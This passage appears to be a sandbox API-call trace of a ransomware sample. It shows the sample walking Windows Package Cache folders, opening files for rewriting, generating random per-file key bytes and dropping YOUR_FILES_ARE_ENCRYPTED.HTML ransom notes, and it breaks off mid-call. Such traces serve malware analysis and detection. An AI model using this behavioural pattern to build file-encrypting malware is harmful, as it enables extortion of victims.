ftLastAccessTime.dwLowDateTime=0xc0b40d00, ftLastAccessTime.dwHighDateTime=0x1cf3e1e, ftLastWriteTime.dwLowDateTime=0xc0b40d00, ftLastWriteTime.dwHighDateTime=0x1cf3e1e, nFileSizeHigh=0x0, nFileSizeLow=0xf36be, dwReserved0=0x0, dwReserved1=0x60, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0158.018] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 121 [0158.018] lstrcmpW (lpString1="cab1.cab", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0158.018] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0158.018] lstrlenW (lpString=".cab") returned 4 [0158.018] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0158.018] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0158.018] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package 
cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a0 [0158.019] GetFileSizeEx (in: hFile=0x5a0, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=997054) returned 1 [0158.019] GetProcessHeap () returned 0x270000 [0158.019] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0158.023] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="66") returned 2 [0158.023] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="31") returned 2 [0158.023] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="6E") returned 2 [0158.023] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="8D") returned 2 [0158.023] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="EE") returned 2 [0158.023] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="6B") returned 2 [0158.023] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="79") returned 2 [0158.023] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="9E") returned 2 [0158.023] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="6F") returned 2 [0158.023] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="37") returned 2 [0158.023] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="3C") returned 2 [0158.023] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="35") returned 2 [0158.023] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="C8") returned 2 [0158.023] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="BB") returned 2 [0158.023] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="6C") returned 2 [0158.023] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="AE") returned 2 
[0158.024] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="92") returned 2 [0158.024] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="1B") returned 2 [0158.024] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="2F") returned 2 [0158.024] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="17") returned 2 [0158.024] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="33") returned 2 [0158.024] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="6A") returned 2 [0158.024] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="57") returned 2 [0158.024] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="2F") returned 2 [0158.024] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="4F") returned 2 [0158.024] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="2B") returned 2 [0158.024] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="2A") returned 2 [0158.024] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="49") returned 2 [0158.024] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="9C") returned 2 [0158.024] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="2A") returned 2 [0158.024] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="E9") returned 2 [0158.024] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="6B") returned 2 [0158.025] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" [0158.025] CreateIoCompletionPort 
(FileHandle=0x5a0, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0158.025] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0158.025] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0b40d00, ftCreationTime.dwHighDateTime=0x1cf3e1e, ftLastAccessTime.dwLowDateTime=0xc0b40d00, ftLastAccessTime.dwHighDateTime=0x1cf3e1e, ftLastWriteTime.dwLowDateTime=0xc0b40d00, ftLastWriteTime.dwHighDateTime=0x1cf3e1e, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0158.025] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 138 [0158.025] lstrcmpW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0158.025] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0158.025] lstrlenW (lpString=".msi") returned 4 [0158.025] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0158.026] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0b40d00, ftCreationTime.dwHighDateTime=0x1cf3e1e, ftLastAccessTime.dwLowDateTime=0xc0b40d00, ftLastAccessTime.dwHighDateTime=0x1cf3e1e, ftLastWriteTime.dwLowDateTime=0xc0b40d00, ftLastWriteTime.dwHighDateTime=0x1cf3e1e, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0158.027] FindClose (in: 
hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0158.027] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 142 [0158.027] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0158.060] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0158.062] CloseHandle (hObject=0x5a0) returned 1 [0158.063] GetProcessHeap () returned 0x270000 [0158.064] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0158.069] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179add90, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179d3ef0, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179d3ef0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0158.069] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0158.070] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0158.070] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0158.070] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0158.072] CloseHandle (hObject=0x598) returned 1 [0158.073] GetProcessHeap () returned 0x270000 [0158.074] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0158.074] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179add90, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179add90, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179add90, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 0 [0158.074] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0158.074] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0158.075] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package 
Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0158.075] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0158.077] CloseHandle (hObject=0x58c) returned 1 [0158.077] GetProcessHeap () returned 0x270000 [0158.078] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0158.078] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35b7fb90, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35b7fb90, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508", cAlternateFileName="{2BC3B~1.285")) returned 1 [0158.078] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508") returned 83 [0158.078] GetProcessHeap () returned 0x270000 [0158.078] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0158.078] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508") 
returned="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508" [0158.078] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\*" [0158.078] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35b7fb90, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35b7fb90, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0158.079] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35b7fb90, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35b7fb90, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.079] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35b7fb90, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35b7fb90, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, 
dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 1 [0158.079] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages") returned 92 [0158.079] GetProcessHeap () returned 0x270000 [0158.079] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0158.079] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages" [0158.079] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\*" [0158.079] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35b7fb90, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35b7fb90, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0158.080] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, 
ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35b7fb90, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35b7fb90, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.080] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35ba5cf0, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35ba5cf0, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0158.080] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86") returned 113 [0158.080] GetProcessHeap () returned 0x270000 [0158.080] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0158.082] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86" [0158.083] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package 
Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\*" [0158.083] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35ba5cf0, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35ba5cf0, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0158.083] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35ba5cf0, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35ba5cf0, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.083] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb21afe00, ftCreationTime.dwHighDateTime=0x1d5c5ba, ftLastAccessTime.dwLowDateTime=0xb21afe00, ftLastAccessTime.dwHighDateTime=0x1d5c5ba, ftLastWriteTime.dwLowDateTime=0xb21afe00, ftLastWriteTime.dwHighDateTime=0x1d5c5ba, nFileSizeHigh=0x0, nFileSizeLow=0x14de75, dwReserved0=0x0, dwReserved1=0x60, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0158.083] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 122 [0158.083] lstrcmpW (lpString1="cab1.cab", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0158.083] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0158.083] lstrlenW (lpString=".cab") returned 4 [0158.083] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0158.083] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0158.084] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{2bc3bd4d-faba-4394-93c7-9ac82a263fe2}v14.25.28508\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x4a8 [0158.084] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=1367669) returned 1 [0158.084] GetProcessHeap () returned 0x270000 [0158.084] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0158.090] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="47") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="81") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="6B") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="00") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="3F") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="B5") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="1F") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | 
out: param_1="B3") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="A3") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="CA") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="B1") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="C7") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="CE") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="92") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="5A") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="5B") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="D8") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="30") returned 2 [0158.090] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="FC") returned 2 [0158.091] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="07") returned 2 [0158.091] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="1A") returned 2 [0158.091] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="FC") returned 2 [0158.091] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="02") returned 2 [0158.091] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="CE") returned 2 [0158.091] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="F2") returned 2 [0158.091] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="DD") returned 2 [0158.091] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="91") returned 2 [0158.091] wsprintfW (in: 